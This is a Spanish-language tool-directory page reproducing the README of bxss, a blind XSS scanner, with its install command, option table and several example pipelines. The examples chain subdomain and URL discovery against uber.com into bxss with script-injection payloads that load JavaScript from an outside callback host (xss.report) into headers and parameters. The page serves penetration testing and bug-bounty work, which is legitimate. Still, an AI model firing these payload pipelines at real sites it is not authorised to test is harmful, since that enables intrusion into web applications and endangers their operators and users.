Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
bxss — Blind XSS Scanner es una herramienta que se puede utilizar para escanear vulnerabilidades de XSS ciego en aplicaciones web. | Kitploit
Herramientas/GitHubGitHub/ethicalhackingplayground/bxss
Escáneres de VulnerabilidadesEscáneres de Vulnerabilidades WebRecopilación de InformaciónSeguridad WebPruebas de Penetración
GitHubethicalhackingplayground/bxss

bxss

Blind XSS Scanner es una herramienta que se puede utilizar para escanear vulnerabilidades de XSS ciego en aplicaciones web.

Ver Repositorio
41855hace 1 añoRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir


Bxss
Bxss - Escáner de XSS Ciego

Version License Go Report Card Go Reference


🚀 Descripción

Bxss es un escáner de XSS ciego de alto rendimiento que automatiza la detección de vulnerabilidades de XSS ciego en aplicaciones web.


✨ Características

  • Inyecta payloads de XSS ciego en cabeceras y parámetros personalizados
  • Soporta múltiples métodos HTTP (PUT, POST, GET, OPTIONS)
  • Escaneo de alta velocidad con soporte de concurrencia
  • Fácilmente encadenable con otras herramientas
  • Instalación y uso simples

🧠 En Progreso

Estamos trabajando activamente en integrar un pool de workers basado en Chromium para mejorar el rendimiento de bxss en dispositivos de bajos recursos.

Esta característica permitirá que tareas intensivas en recursos, como la detección de XSS basado en DOM o la inspección de payloads tras el disparo, sean descargadas a instancias ligeras de Chromium gestionadas a través de un pool. Al distribuir la carga de trabajo entre múltiples contextos de navegador headless de manera controlada y eficiente, bxss seguirá siendo receptivo y utilizable incluso en máquinas de especificaciones más bajas.

Esto hará que bxss no solo sea potente sino también altamente accesible, independientemente de las limitaciones del sistema.


✅ TAREAS PENDIENTES

  • Pool de workers basado en Chromium para interacción con el DOM y verificación visual
  • Salida de informes opcional en HTML/JSON
  • Añadir soporte para personalización de payloads multiplataforma (XSS Hunter, Interactsh, etc.)
  • Soporte proxy
  • Importar solicitudes personalizadas

🧪 Características Experimentales

  • Modo de rastreo (experimental)

📦 Instalación

root@kitploit:~
go install -v github.com/ethicalhackingplayground/bxss/v2/cmd/bxss@latest

⚙️ Argumentos


🎬 Demostración

Demostración


📝 ¿Qué es el Modo de Rastreo?

El Modo de Rastreo es una característica experimental que te permite rastrear dónde se disparó el BlindXSS; algunas plataformas de BlindXSS de terceros como https://xss.report/ te permiten especificar parámetros personalizados en tus payloads, esto te permite rastrear dónde se disparó el BlindXSS. Por ejemplo, si especificas el parámetro url=https://somehost.com en tu payload, la herramienta usará el payload

root@kitploit:~
'"><script src=https://xss.report/c/username?url=https://somehost.com></script>'

para las pruebas y, al dispararse, podrás inspeccionar el DOM y ver desde qué host se disparó el BlindXSS.

Informe Xss

Asegúrate de que al asignar parámetros personalizados en tu panel asignes url={LINK} para que bxss pueda reemplazar automáticamente {LINK} con la URL real.

🔥 Ejemplos de Uso

Parámetros

root@kitploit:~
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-t

Agregar a Parámetros

root@kitploit:~
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-t

Ambas Cabeceras y Parámetros

root@kitploit:~
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t

Cabecera X-Forwarded-For

root@kitploit:~
subfinder -d uber.com \
| gau \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "X-Forwarded-For"

Cabeceras y Parámetros Personalizados

root@kitploit:~
echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t

Google Dorks con Dorki

root@kitploit:~
curl -X GET -H "Authorization: Bearer <Token>" \
-H "X-Secret-Key: <Secret>" \
https://dorki.attaxa.com/api/search?q=site:example.com -s \
| jq -r .[][].url \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>'

Cabeceras y Parámetros Personalizados con Límite de Velocidad

root@kitploit:~
echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \ 
-t \
-rl 10

Para dorking avanzado y exploración de vulnerabilidades, echa un vistazo a Dorki y ¡regístrate hoy!


☕ Apoya el Proyecto

Si obtienes un bounty usando esta herramienta, ¡considera apoyarme comprándome un café!

Cómprame un Café

Descargar herramienta
ArgumentoDescripciónPor defecto
-aAgregar el payload al parámetrofalse
-c intEstablecer el nivel de concurrencia30
-H stringEstablecer una cabecera personalizada""
-hf stringRuta al archivo con cabeceras""
-p stringEl payload de XSS ciego""
-pf stringRuta al archivo con payloads""
-tProbar parámetros para XSS ciegofalse
-X stringMétodo HTTP a utilizar""
-vHabilitar modo depuraciónfalse
-rl floatLímite de velocidad (solicitudes por segundo)0
-fSeguir redireccionesfalse
-lHabilitar Modo de Rastreo (experimental)false